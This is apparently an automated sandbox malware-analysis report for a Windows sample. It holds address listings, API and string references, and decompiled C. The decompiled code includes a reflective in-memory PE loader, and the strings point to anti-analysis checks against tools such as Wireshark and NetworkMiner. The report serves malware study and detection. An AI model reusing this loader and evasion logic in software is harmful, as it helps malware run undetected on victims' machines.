0x00406109
0x00406109
0x0040610e
0x00406113
0x0040611d
0x00406127
0x00406134
0x00406134
0x00406136
0x00406137
0x00406137
0x0040613d
0x00406149
0x0040614e
0x00406155
0x0040615a
0x00406163
0x0040616a
0x00406172
0x0040617a
0x00406180
0x00406187
0x0040618c
0x0040618f
0x00406196
0x004061a4
0x004061aa
0x004061b7
0x004061bc
0x004061bc
0x00406196
0x004061bf
0x004061c4
0x004061c6
0x004061c8
0x004061cf
0x004061cf
0x004061d1
0x004061d1
0x004061d6
0x004061db
0x004061e5
0x004061ef
0x00406200
0x00406200
0x00406202
0x00406203
0x00406203
0x00406209
0x0040620f
0x00406215
0x0040621a
0x00406220
0x00406223
0x00000000
0x00000000
0x00406229
0x0040622f
0x00406230
0x00406232
0x00406238
0x0040624e
0x0040624e
0x00406250
0x00406255
0x0040625c
0x0040625f
0x00406266
0x0040626e
0x00000000
0x0040626e
0x0040623a
0x0040623d
0x00406245
0x00406248
0x00000000
0x00000000
0x00000000
0x00406248
0x00405f9b
0x00405fa1
0x00405fa2
0x00405fa4
0x00405faa
0x00405fc0
0x00405fc0
0x00405fc2
0x00405fc7
0x00405fcd
0x00000000
0x00405fcd
0x00405fac
0x00405faf
0x00405fb7
0x00405fba
0x00000000
0x00000000
0x00000000
0x00405fba
0x00405e2d
0x00405e33
0x00405e34
0x00405e36
0x00405e3c
0x00405e52
0x00405e52
0x00405e54
0x00405e59
0x00000000
0x00405e59
0x00405e3e
0x00405e41
0x00405e49
0x00405e4c
0x00000000
0x00000000
0x00000000
0x00405e4c
0x00405da6
0x00405dac
0x00405dad
0x00405daf
0x00405db5
0x00405dcb
0x00405dcb
0x00405dcd
0x00405dd2
0x00000000
0x00405dd2
0x00405db7
0x00405dba
0x00405dc2
0x00405dc5
0x00000000
0x00000000
0x00000000
0x00405ccc
0x00405ccc
0x00405cd3
0x00405cd8
0x00405cdf
0x00405ce3
0x00405cea
0x00405cf0
0x00405cf0
0x00405cf7
0x00405cf8
0x00405cf8
0x00000000
0x00405cf0
0x00405bd5
0x00405bd5
0x00405bd7
0x00405be0
0x00405be0
0x00405be7
0x00405be8
0x00405be8
0x00000000
0x00405be0
0x00405ad3
0x00405ad3
0x00405ad3
0x00405ad5
0x00405ad5
0x00405adc
0x00405add
0x00405add
0x00000000
0x00405ad5
0x00405ad1
0x00000000
0x004058d9
0x004058be
0x004058c2
0x004058c4
0x00000000
0x00000000
0x004058c6
0x004058ca
0x004058cc
0x00000000
0x00000000
0x004058ce
0x00000000
0x004058ce
0x004058b5
0x00405800
0x00405802
0x00405804
0x00405807
0x0040580b
0x0040580d
0x0040580d
0x00405815
0x00405817
0x0040581b
0x00405822
0x00405827
0x00405830
0x00000000
0x00000000
0x00000000
0x00405199
0x00405189
0x00000000
0x004050d7
0x004050d7
0x004050d9
0x004050dc
0x00000000
0x004050de
0x004050e0
0x004050ec
0x004050f1
0x004050f7
0x004050fb
0x00405108
0x00405113
0x00405115
0x0040511b
0x00405125
0x0040512f
0x00405132
0x00405132
0x00000000

APIs

__Init_thread_footer.LIBCMT ref: 0040541B
GetUserNameA.ADVAPI32(?,lK@MF.), ref: 004054D6
GetForegroundWindow.USER32(?,?), ref: 004055AF
GetWindowTextA.USER32 ref: 004055C2
Sleep.KERNEL32(00000258), ref: 004056F2
GetForegroundWindow.USER32 ref: 004056F4
GetWindowTextA.USER32 ref: 00405707
__Init_thread_footer.LIBCMT ref: 0040506F

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

__Init_thread_footer.LIBCMT ref: 0040523E
GetUserNameA.ADVAPI32(?,}FOF@.), ref: 004052D6
GetUserNameA.ADVAPI32(?,OJCG@.), ref: 00405113

Part of subcall function 0040D738: EnterCriticalSection.KERNEL32(0043C4FC,?,?,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D743
Part of subcall function 0040D738: LeaveCriticalSection.KERNEL32(0043C4FC,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D780

Strings

mixazed, xrefs: 00406043
NetworkMiner, xrefs: 0040566A
SUB=, xrefs: 00405D60
mixtwo, xrefs: 00405FEF
debug, xrefs: 004056DB
]Z\K, xrefs: 00406B3A
test, xrefs: 0040593C
Wireshark, xrefs: 0040564E
ZK]Z, xrefs: 004053B4
OJCG@., xrefs: 00405048
L\O\, xrefs: 00405C43
CGV., xrefs: 00405EC5
Far , xrefs: 004055F3, 00405738
HTTP Analyzer, xrefs: 00405632
roxifier, xrefs: 00405616
mixnull, xrefs: 00406019
/chk, xrefs: 004058EF
dbg, xrefs: 004056C3

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSectionWindow$Init_thread_footerNameUser$EnterForegroundLeaveText$ConditionSleepVariableWake
String ID: Far $/chk$CGV.$HTTP Analyzer$L\O\$NetworkMiner$OJCG@.$SUB=$Wireshark$ZK]Z$]Z\K$dbg$debug$mixazed$mixnull$mixtwo$roxifier$test
API String ID: 3399126515-1242400080
Opcode ID: 3d508d49aed3422a45a232eb9021d52f07bda4fcfa402414cbdf0e4abd0fbac9
Instruction ID: ff539f3243dc3daa9a616b403a3b39b87929d56e782a60a2ec5d1fc13fcc2ba2
Opcode Fuzzy Hash: 3d508d49aed3422a45a232eb9021d52f07bda4fcfa402414cbdf0e4abd0fbac9
Instruction Fuzzy Hash: DA2217719002488BDB28DB34DC8ABDE7B75EB46308F1441FAD448B72D2DB795A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402800 Relevance: 37.3, APIs: 11, Strings: 10, Instructions: 504
COMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E00402800(signed int* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t181;
				void* _t190;
				long _t192;
				long _t197;
				void* _t202;
				void* _t204;
				signed int _t206;
				signed int _t207;
				signed int _t212;
				intOrPtr _t215;
				intOrPtr* _t218;
				intOrPtr* _t224;
				signed int* _t226;
				signed int* _t229;
				signed int _t235;
				signed int _t236;
				signed char _t237;
				void _t238;
				signed int _t241;
				void* _t250;
				void* _t259;
				void* _t266;
				intOrPtr _t269;
				signed int _t279;
				signed char _t280;
				signed int _t281;
				void* _t282;
				signed int _t284;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				void* _t297;
				intOrPtr _t306;
				intOrPtr _t310;
				void* _t315;
				void* _t324;
				signed int _t326;
				signed short* _t327;
				void* _t328;
				signed int _t330;
				long _t333;
				long _t334;
				void* _t335;
				void* _t336;
				void* _t337;
				void* _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				void* _t342;
				void* _t343;
				void* _t344;
				intOrPtr _t346;
				void* _t348;
				void* _t350;
				void* _t352;
				intOrPtr _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				intOrPtr* _t357;
				signed int _t361;
				signed int _t363;
				void* _t364;
				intOrPtr _t366;
				signed int _t368;
				intOrPtr _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				void* _t376;

				_t181 =  *0x43b054; // 0x41d6575c
				_v8 = _t181 ^ _t373;
				_t276 = __edx;
				_t322 = __ecx;
				_t346 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				if(__edx >= 0x40) {
					if( *__ecx == 0x5a4d) {
						_t279 = __ecx[0xf];
						_v68 = _t279;
						if(__edx >= _t279 + 0xf8) {
							_t276 = __ecx + _t279;
							_v64 = _t276;
							if( *(__ecx + _t279) == 0x4550) {
								if( *((intOrPtr*)(_t276 + 4)) == 0x14c) {
									_t280 =  *(_t276 + 0x38);
									if((_t280 & 0x00000001) == 0) {
										_t330 =  *(_t276 + 6) & 0x0000ffff;
										_t324 = ( *(_t276 + 0x14) & 0x0000ffff) + 0x24;
										if(_t330 != 0) {
											_t328 = _t324 + _t276;
											do {
												_t269 =  *((intOrPtr*)(_t328 + 4));
												_t328 = _t328 + 0x28;
												_t314 =  !=  ? _t269 : _t280;
												_t315 = ( !=  ? _t269 : _t280) +  *((intOrPtr*)(_t328 - 0x28));
												_t316 =  <=  ? _t346 : _t315;
												_t346 =  <=  ? _t346 : _t315;
												_t280 =  *(_t276 + 0x38);
												_t330 = _t330 - 1;
											} while (_t330 != 0);
										}
										__imp__GetNativeSystemInfo( &_v44);
										_t281 = _v40;
										_t322 =  !(_t281 - 1);
										_t333 = _t281 - 0x00000001 +  *((intOrPtr*)(_t276 + 0x50)) & _t322;
										if(_t333 == (_t281 - 0x00000001 + _t346 & _t322)) {
											_t190 = VirtualAlloc( *(_t276 + 0x34), _t333, 0x3000, 4);
											_v72 = _t190;
											if(_t190 != 0) {
												L22:
												_t192 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												_t282 = _v72;
												_t334 = _t192;
												_v76 = _t334;
												if(_t334 != 0) {
													 *(_t334 + 4) = _t282;
													 *((intOrPtr*)(_t334 + 0x1c)) = E00402780;
													 *(_t334 + 0x14) = ( *(_t276 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
													 *((intOrPtr*)(_t334 + 0x20)) = E004027A0;
													 *((intOrPtr*)(_t334 + 0x24)) = E004027C0;
													 *((intOrPtr*)(_t334 + 0x28)) = E004027D0;
													 *((intOrPtr*)(_t334 + 0x2c)) = E004027F0;
													 *((intOrPtr*)(_t334 + 0x34)) = 0;
													 *(_t334 + 0x3c) = _v40;
													_t197 =  *(_t276 + 0x54);
													if(_v56 >= _t197) {
														_t348 = VirtualAlloc(_t282, _t197, 0x1000, 4);
														E0040ECB0(_t348, _v48,  *(_t276 + 0x54));
														_t375 = _t374 + 0xc;
														_v60 = 0;
														_t202 = _v48[0xf] + _t348;
														 *_t334 = _t202;
														 *((intOrPtr*)(_t202 + 0x34)) = _v72;
														_t284 =  *_t334;
														_t322 =  *(_t334 + 4);
														_v52 = _t322;
														_t204 = ( *(_t284 + 0x14) & 0x0000ffff) + 0x24;
														if(0 >=  *(_t284 + 6)) {
															L40:
															_t206 =  *((intOrPtr*)(_t284 + 0x34)) -  *(_t276 + 0x34);
															_v64 = _t206;
															if(_t206 == 0) {
																L52:
																_t207 = 1;
															} else {
																if( *((intOrPtr*)(_t284 + 0xa4)) != 0) {
																	_t322 =  *(_t334 + 4);
																	_t276 =  *((intOrPtr*)(_t284 + 0xa0)) + _t322;
																	_v56 = _t322;
																	_t238 =  *_t276;
																	if(_t238 != 0) {
																		do {
																			_t306 =  *((intOrPtr*)(_t276 + 4));
																			_v68 = _t238 + _t322;
																			_t327 = _t276 + 8;
																			_t364 = 0;
																			if((_t306 - 0x00000008 & 0xfffffffe) > 0) {
																				_t341 = _v68;
																				asm("o16 nop [eax+eax]");
																				do {
																					_t241 =  *_t327 & 0x0000ffff;
																					if((_t241 & 0x0000f000) == 0x3000) {
																						 *((intOrPtr*)((_t241 & 0x00000fff) + _t341)) =  *((intOrPtr*)((_t241 & 0x00000fff) + _t341)) + _v64;
																					}
																					_t306 =  *((intOrPtr*)(_t276 + 4));
																					_t364 = _t364 + 1;
																					_t327 =  &(_t327[1]);
																				} while (_t364 < _t306 - 8 >> 1);
																			}
																			_t238 =  *(_t276 + _t306);
																			_t276 = _t276 + _t306;
																			_t322 = _v56;
																		} while (_t238 != 0);
																		_t334 = _v76;
																	}
																	goto L52;
																} else {
																	_t207 = 0;
																}
															}
															 *((intOrPtr*)(_t334 + 0x18)) = _t207;
															if(E00402610(_t334) == 0) {
																goto L27;
															} else {
																_t276 =  *_t334;
																_t352 = _t276 + ( *(_t276 + 0x14) & 0x0000ffff);
																_t212 =  *(_t352 + 0x20);
																_t291 =  ~( *(_t334 + 0x3c)) & _t212;
																_v64 = _t291;
																_v92 = _t291;
																_t292 =  *((intOrPtr*)(_t352 + 0x28));
																_v60 = _t212;
																_v96 = _t212;
																if(_t292 == 0) {
																	_t237 =  *(_t352 + 0x3c);
																	if((_t237 & 0x00000040) == 0) {
																		if(_t237 < 0) {
																			_t292 =  *((intOrPtr*)(_t276 + 0x24));
																		}
																	} else {
																		_t292 =  *((intOrPtr*)(_t276 + 0x20));
																	}
																}
																_t326 =  *(_t352 + 0x3c);
																_v88 = _t292;
																_v84 = _t326;
																_v80 = 0;
																_v68 = 1;
																if(1 >=  *(_t276 + 6)) {
																	L76:
																	_t322 =  &_v96;
																	_v80 = 1;
																	if(E004024E0(_t276, _t334,  &_v96) == 0) {
																		goto L27;
																	} else {
																		_t322 =  *_t334;
																		_t294 = _t322;
																		_t353 =  *((intOrPtr*)(_t322 + 0xc0));
																		if(_t353 != 0) {
																			_t276 =  *(_t334 + 4);
																			_t357 =  *((intOrPtr*)(_t276 + _t353 + 0xc));
																			if(_t357 != 0) {
																				_t224 =  *_t357;
																				if(_t224 != 0) {
																					do {
																						 *_t224(_t276, 1, 0);
																						_t224 =  *((intOrPtr*)(_t357 + 4));
																						_t357 = _t357 + 4;
																					} while (_t224 != 0);
																					_t294 =  *_t334;
																				}
																			}
																		}
																		_t215 =  *((intOrPtr*)(_t294 + 0x28));
																		if(_t215 == 0) {
																			 *((intOrPtr*)(_t334 + 0x38)) = 0;
																			_pop(_t336);
																			_pop(_t354);
																			return E0040D3AF(_t334, _t276, _v8 ^ _t373, _t322, _t336, _t354);
																		} else {
																			_t297 = _v72;
																			_t218 = _t215 + _t297;
																			if( *(_t334 + 0x14) == 0) {
																				 *((intOrPtr*)(_t334 + 0x38)) = _t218;
																				_pop(_t337);
																				_pop(_t355);
																				return E0040D3AF(_t334, _t276, _v8 ^ _t373, _t322, _t337, _t355);
																			} else {
																				_push(0);
																				_push(1);
																				_push(_t297);
																				if( *_t218() != 0) {
																					 *((intOrPtr*)(_t334 + 0x10)) = 1;
																					_pop(_t338);
																					_pop(_t356);
																					return E0040D3AF(_t334, _t276, _v8 ^ _t373, _t322, _t338, _t356);
																				} else {
																					_push(0x45a);
																					goto L26;
																				}
																			}
																		}
																	}
																} else {
																	_t226 = _t352 + 0x64;
																	_v48 = _t226;
																	do {
																		_v56 =  *((intOrPtr*)(_t226 - 0x1c));
																		_t339 =  *((intOrPtr*)(_t226 - 0x14));
																		_t361 =  ~( *(_t334 + 0x3c)) & _v56;
																		_v52 = _t339;
																		_t334 = _v76;
																		if(_t339 == 0) {
																			if(( *_t226 & 0x00000040) == 0) {
																				if(( *_t226 & 0x00000080) != 0) {
																					_t340 =  *((intOrPtr*)(_t276 + 0x24));
																					goto L66;
																				}
																			} else {
																				_t340 =  *((intOrPtr*)(_t276 + 0x20));
																				L66:
																				_v52 = _t340;
																				_t334 = _v76;
																			}
																		}
																		if(_v64 == _t361) {
																			L72:
																			_t326 = _t326 |  *_t226;
																			asm("bt eax, 0x19");
																			if(_t326 >= 0) {
																				_t326 = _t326 & 0xfdffffff;
																			}
																			_t292 = _v52 - _v60 + _v56;
																			_t229 = _v48;
																			goto L75;
																		} else {
																			if(_v60 + _t292 > _t361) {
																				_t226 = _v48;
																				goto L72;
																			} else {
																				_t322 =  &_v96;
																				if(E004024E0(_t276, _t334,  &_v96) == 0) {
																					goto L27;
																				} else {
																					_t235 = _v56;
																					_t292 = _v52;
																					_t276 =  *_t334;
																					_v60 = _t235;
																					_v96 = _t235;
																					_t236 = _t361;
																					_v64 = _t236;
																					_v92 = _t236;
																					_t229 = _v48;
																					_t326 =  *_t229;
																					goto L75;
																				}
																			}
																		}
																		goto L90;
																		L75:
																		_v48 =  &(_t229[0xa]);
																		_t363 = _v68 + 1;
																		_v84 = _t326;
																		_t226 = _v48;
																		_v88 = _t292;
																		_v68 = _t363;
																	} while (_t363 < ( *(_t276 + 6) & 0x0000ffff));
																	goto L76;
																}
															}
														} else {
															_t276 = _t204 + _t284;
															do {
																_t310 =  *((intOrPtr*)(_t276 + 4));
																if(_t310 != 0) {
																	if(_v56 <  *(_t276 + 8) + _t310) {
																		goto L25;
																	} else {
																		_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x1c))))( *_t276 + _t322, _t310, 0x1000, 4,  *((intOrPtr*)(_t334 + 0x34)));
																		_t376 = _t375 + 0x14;
																		if(_t250 == 0) {
																			goto L27;
																		} else {
																			_t366 =  *_t276 + _v52;
																			E0040ECB0(_t366, _v48 +  *(_t276 + 8),  *((intOrPtr*)(_t276 + 4)));
																			 *((intOrPtr*)(_t276 - 4)) = _t366;
																			goto L37;
																		}
																	}
																} else {
																	_t369 =  *((intOrPtr*)( &(_v48[0xe]) + _v68));
																	if(_t369 <= 0) {
																		goto L38;
																	} else {
																		_t259 =  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x1c))))( *_t276 + _t322, _t369, 0x1000, 4,  *((intOrPtr*)(_t334 + 0x34)));
																		_t376 = _t375 + 0x14;
																		if(_t259 == 0) {
																			goto L27;
																		} else {
																			 *((intOrPtr*)(_t276 - 4)) =  *_t276 + _v52;
																			E0040F2F0(_t334,  *_t276 + _v52, 0, _t369);
																			L37:
																			_t322 = _v52;
																			_t375 = _t376 + 0xc;
																			goto L38;
																		}
																	}
																}
																goto L90;
																L38:
																_t284 =  *_t334;
																_t276 = _t276 + 0x28;
																_t368 = _v60 + 1;
																_v60 = _t368;
															} while (_t368 < ( *(_t284 + 6) & 0x0000ffff));
															_t276 = _v64;
															goto L40;
														}
													} else {
														L25:
														_push(0xd);
														L26:
														SetLastError();
														L27:
														E00402F60(_t334);
														_pop(_t335);
														_pop(_t350);
														return E0040D3AF(0, _t276, _v8 ^ _t373, _t322, _t335, _t350);
													}
												} else {
													VirtualFree(_t282, _t192, 0x8000);
													_push(0xe);
													goto L5;
												}
											} else {
												_t266 = VirtualAlloc(_t190, _t333, 0x3000, 4);
												_v72 = _t266;
												if(_t266 != 0) {
													goto L22;
												} else {
													_push("ERROR_OUTOFMEMORY!\n");
													E004024B0();
													_push(0xe);
													goto L5;
												}
											}
										} else {
											_push("alignedImageSize != AlignValueUp!\n");
											goto L4;
										}
									} else {
										_push("Section alignment invalid!\n");
										goto L4;
									}
								} else {
									_push("FileHeader.Machine != HOST_MACHINE!\n");
									goto L4;
								}
							} else {
								_push("Signature != IMAGE_NT_SIGNATURE!\n");
								goto L4;
							}
						} else {
							SetLastError(0xd);
							_push("DOS header size is not valid!\n");
							E004024B0();
							_pop(_t343);
							_pop(_t371);
							_t9 =  &_v8; // 0x402466
							return E0040D3AF(0, _t276,  *_t9 ^ _t373, _t322, _t343, _t371);
						}
					} else {
						_push("DOS header is not valid!\n");
						L4:
						E004024B0();
						_push(0xc1);
						L5:
						SetLastError();
						_pop(_t342);
						_pop(_t370);
						_t5 =  &_v8; // 0x402466
						return E0040D3AF(0, _t276,  *_t5 ^ _t373, _t322, _t342, _t370);
					}
				} else {
					SetLastError(0xd);
					_push("Size is not valid!\n");
					E004024B0();
					_pop(_t344);
					_pop(_t372);
					_t4 =  &_v8; // 0x402466
					return E0040D3AF(0, _t276,  *_t4 ^ _t373, _t322, _t344, _t372);
				}
				L90:
			}

0x00402806
0x0040280d
0x00402811
0x00402813
0x00402816
0x00402818
0x0040281b
0x00402822
0x00402854
0x00402881
0x00402884
0x0040288f
0x004028c0
0x004028c3
0x004028c6
0x004028d8
0x004028e4
0x004028ea
0x004028fa
0x004028fe
0x00402903
0x00402905
0x00402907
0x00402907
0x0040290a
0x0040290f
0x00402912
0x00402917
0x0040291a
0x0040291c
0x0040291f
0x0040291f
0x00402907
0x00402928
0x0040292e
0x00402937
0x00402941
0x00402947
0x00402964
0x00402966
0x0040296b
0x00402993
0x0040299e
0x004029a4
0x004029a7
0x004029a9
0x004029ae
0x004029c4
0x004029d1
0x004029d8
0x004029db
0x004029e2
0x004029e9
0x004029f0
0x004029f7
0x00402a01
0x00402a04
0x00402a0a
0x00402a3c
0x00402a42
0x00402a4a
0x00402a50
0x00402a5a
0x00402a5e
0x00402a60
0x00402a63
0x00402a65
0x00402a68
0x00402a6f
0x00402a76
0x00402b2f
0x00402b32
0x00402b35
0x00402b38
0x00402bbd
0x00402bbd
0x00402b3e
0x00402b45
0x00402b4b
0x00402b54
0x00402b56
0x00402b59
0x00402b5d
0x00402b60
0x00402b60
0x00402b65
0x00402b68
0x00402b6b
0x00402b75
0x00402b77
0x00402b7a
0x00402b80
0x00402b80
0x00402b91
0x00402b9b
0x00402b9b
0x00402b9e
0x00402ba1
0x00402ba2
0x00402baa
0x00402b80
0x00402bae
0x00402bb1
0x00402bb3
0x00402bb6
0x00402bba
0x00402bba
0x00000000
0x00402b47
0x00402b47
0x00402b47
0x00402b45
0x00402bc4
0x00402bce
0x00000000
0x00402bd4
0x00402bd4
0x00402bdf
0x00402be1
0x00402be4
0x00402be6
0x00402be9
0x00402bec
0x00402bef
0x00402bf2
0x00402bf7
0x00402bf9
0x00402bfe
0x00402c07
0x00402c09
0x00402c09
0x00402c00
0x00402c00
0x00402c00
0x00402bfe
0x00402c0c
0x00402c14
0x00402c17
0x00402c1a
0x00402c21
0x00402c2c
0x00402cf5
0x00402cf5
0x00402cf8
0x00402d08
0x00000000
0x00402d0e
0x00402d0e
0x00402d10
0x00402d12
0x00402d1a
0x00402d1c
0x00402d1f
0x00402d25
0x00402d27
0x00402d2b
0x00402d30
0x00402d35
0x00402d37
0x00402d3a
0x00402d3d
0x00402d41
0x00402d41
0x00402d2b
0x00402d25
0x00402d43
0x00402d48
0x00402d9f
0x00402da8
0x00402da9
0x00402db3
0x00402d4a
0x00402d4a
0x00402d4d
0x00402d53
0x00402d84
0x00402d89
0x00402d8a
0x00402d99
0x00402d55
0x00402d55
0x00402d57
0x00402d59
0x00402d5e
0x00402d6a
0x00402d73
0x00402d74
0x00402d83
0x00402d60
0x00402d60
0x00000000
0x00402d60
0x00402d5e
0x00402d53
0x00402d48
0x00402c32
0x00402c32
0x00402c35
0x00402c40
0x00402c43
0x00402c49
0x00402c4e
0x00402c53
0x00402c56
0x00402c59
0x00402c5e
0x00402c68
0x00402c6a
0x00000000
0x00402c6a
0x00402c60
0x00402c60
0x00402c6d
0x00402c6d
0x00402c70
0x00402c70
0x00402c5e
0x00402c76
0x00402cb3
0x00402cb9
0x00402cbb
0x00402cbf
0x00402cc1
0x00402cc1
0x00402ccd
0x00402cd0
0x00000000
0x00402c78
0x00402c7f
0x00402cb0
0x00000000
0x00402c81
0x00402c81
0x00402c8d
0x00000000
0x00402c93
0x00402c93
0x00402c96
0x00402c99
0x00402c9b
0x00402c9e
0x00402ca1
0x00402ca3
0x00402ca6
0x00402ca9
0x00402cac
0x00000000
0x00402cac
0x00402c8d
0x00402c7f
0x00000000
0x00402cd3
0x00402cd9
0x00402cdc
0x00402ce3
0x00402ce6
0x00402ce9
0x00402cec
0x00402cec
0x00000000
0x00402c40
0x00402c2c
0x00402a7c
0x00402a7c
0x00402a80
0x00402a80
0x00402a85
0x00402ad0
0x00000000
0x00402ad6
0x00402ae9
0x00402aeb
0x00402af0
0x00000000
0x00402af6
0x00402b01
0x00402b06
0x00402b0b
0x00000000
0x00402b0b
0x00402af0
0x00402a87
0x00402a8d
0x00402a93
0x00000000
0x00402a95
0x00402aa8
0x00402aaa
0x00402aaf
0x00000000
0x00402ab5
0x00402abe
0x00402ac1
0x00402b0e
0x00402b0e
0x00402b11
0x00000000
0x00402b11
0x00402aaf
0x00402a93
0x00000000
0x00402b14
0x00402b14
0x00402b16
0x00402b1c
0x00402b1d
0x00402b24
0x00402b2c
0x00000000
0x00402b2c
0x00402a0c
0x00402a0c
0x00402a0c
0x00402a0e
0x00402a0e
0x00402a14
0x00402a16
0x00402a1d
0x00402a1e
0x00402a2d
0x00402a2d
0x004029b0
0x004029b7
0x004029bd
0x00000000
0x004029bd
0x0040296d
0x00402976
0x00402978
0x0040297d
0x00000000
0x0040297f
0x0040297f
0x00402984
0x0040298c
0x00000000
0x0040298c
0x0040297d
0x00402949
0x00402949
0x00000000
0x00402949
0x004028ec
0x004028ec
0x00000000
0x004028ec
0x004028da
0x004028da
0x00000000
0x004028da
0x004028c8
0x004028c8
0x00000000
0x004028c8
0x00402891
0x00402893
0x00402899
0x0040289e
0x004028a8
0x004028a9
0x004028ab
0x004028b8
0x004028b8
0x00402856
0x00402856
0x0040285b
0x0040285b
0x00402863
0x00402868
0x00402868
0x00402870
0x00402871
0x00402873
0x00402880
0x00402880
0x00402824
0x00402826
0x0040282c
0x00402831
0x0040283b
0x0040283c
0x0040283e
0x0040284b
0x0040284b
0x00000000

APIs

SetLastError.KERNEL32(0000000D,?), ref: 00402826
SetLastError.KERNEL32(000000C1), ref: 00402868

Strings

@, xrefs: 0040281F
alignedImageSize != AlignValueUp!, xrefs: 00402949
DOS header is not valid!, xrefs: 00402856
f$@, xrefs: 00402873, 004028AB, 0040283E
ERROR_OUTOFMEMORY!, xrefs: 0040297F
DOS header size is not valid!, xrefs: 00402899
FileHeader.Machine != HOST_MACHINE!, xrefs: 004028DA
Signature != IMAGE_NT_SIGNATURE!, xrefs: 004028C8
Size is not valid!, xrefs: 0040282C
Section alignment invalid!, xrefs: 004028EC

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$f$@
API String ID: 1452528299-1093567596
Opcode ID: a54bc6b49d0380bd7e850522ddfd9b4b3cfdbca8ea3db58d45a35b6a0a678f10
Instruction ID: 5b52f2546d10026e7243eca4e129f662e26bc6dd8de2123b4ac76932ac21fc9d
Opcode Fuzzy Hash: a54bc6b49d0380bd7e850522ddfd9b4b3cfdbca8ea3db58d45a35b6a0a678f10
Instruction Fuzzy Hash: B4127B71B002159BDB14DF99DA85BAEB7B1BF48304F14416AE909BB3C1D7B8E801CB98

Uniqueness

Uniqueness Score: -1.00%

Function 008269F6 Relevance: 35.6, APIs: 4, Strings: 16, Instructions: 650COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 00826C5E
__Init_thread_footer.LIBCMT ref: 00826A36

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

__Init_thread_footer.LIBCMT ref: 00826B4A
__Init_thread_footer.LIBCMT ref: 00826FD0

Strings

[], xrefs: 00826BEF
., xrefs: 00826BFF
h@{C, xrefs: 00826D08
RQxf, xrefs: 008271D7
%C, xrefs: 008270CD
B, xrefs: 00827109
M, xrefs: 008270ED
l, xrefs: 00826FC3
RQme, xrefs: 008272E2
Pk, xrefs: 00826E00
pj, xrefs: 00826EE0
RQHc, xrefs: 00827507
D{C, xrefs: 00826D2E
h<{C, xrefs: 00826CED
DP, xrefs: 0082706E
]Z\K, xrefs: 00826DA1

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalInit_thread_footerSection$EnterLeave
String ID: .$D{C$RQHc$RQme$RQxf$[]$]Z\K$h<{C$h@{C$%C$DP$Pk$pj$B$M$l
API String ID: 3080361431-3871655486
Opcode ID: 6856eee338b71b6ab871a6e8583ab2a84cf4ca2b8bb1b5ae23cf72853ee3de69
Instruction ID: 9cf236e889fe5f623b3e4a27ac132be07770ea5beb36cbf001eaebb22226dbbb
Opcode Fuzzy Hash: 6856eee338b71b6ab871a6e8583ab2a84cf4ca2b8bb1b5ae23cf72853ee3de69
Instruction Fuzzy Hash: 79521471A003A88AEB24CB28EC8979DBB71FF56314F1451E8E448B7292E7755BC4CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0082671B Relevance: 35.6, APIs: 4, Strings: 16, Instructions: 649COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 0082697E
__Init_thread_footer.LIBCMT ref: 0082675B

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

__Init_thread_footer.LIBCMT ref: 0082686A

Strings

K[, xrefs: 0082690F
h@{C, xrefs: 00826D08
RQxf, xrefs: 008271D7
%C, xrefs: 008270CD
B, xrefs: 00827109
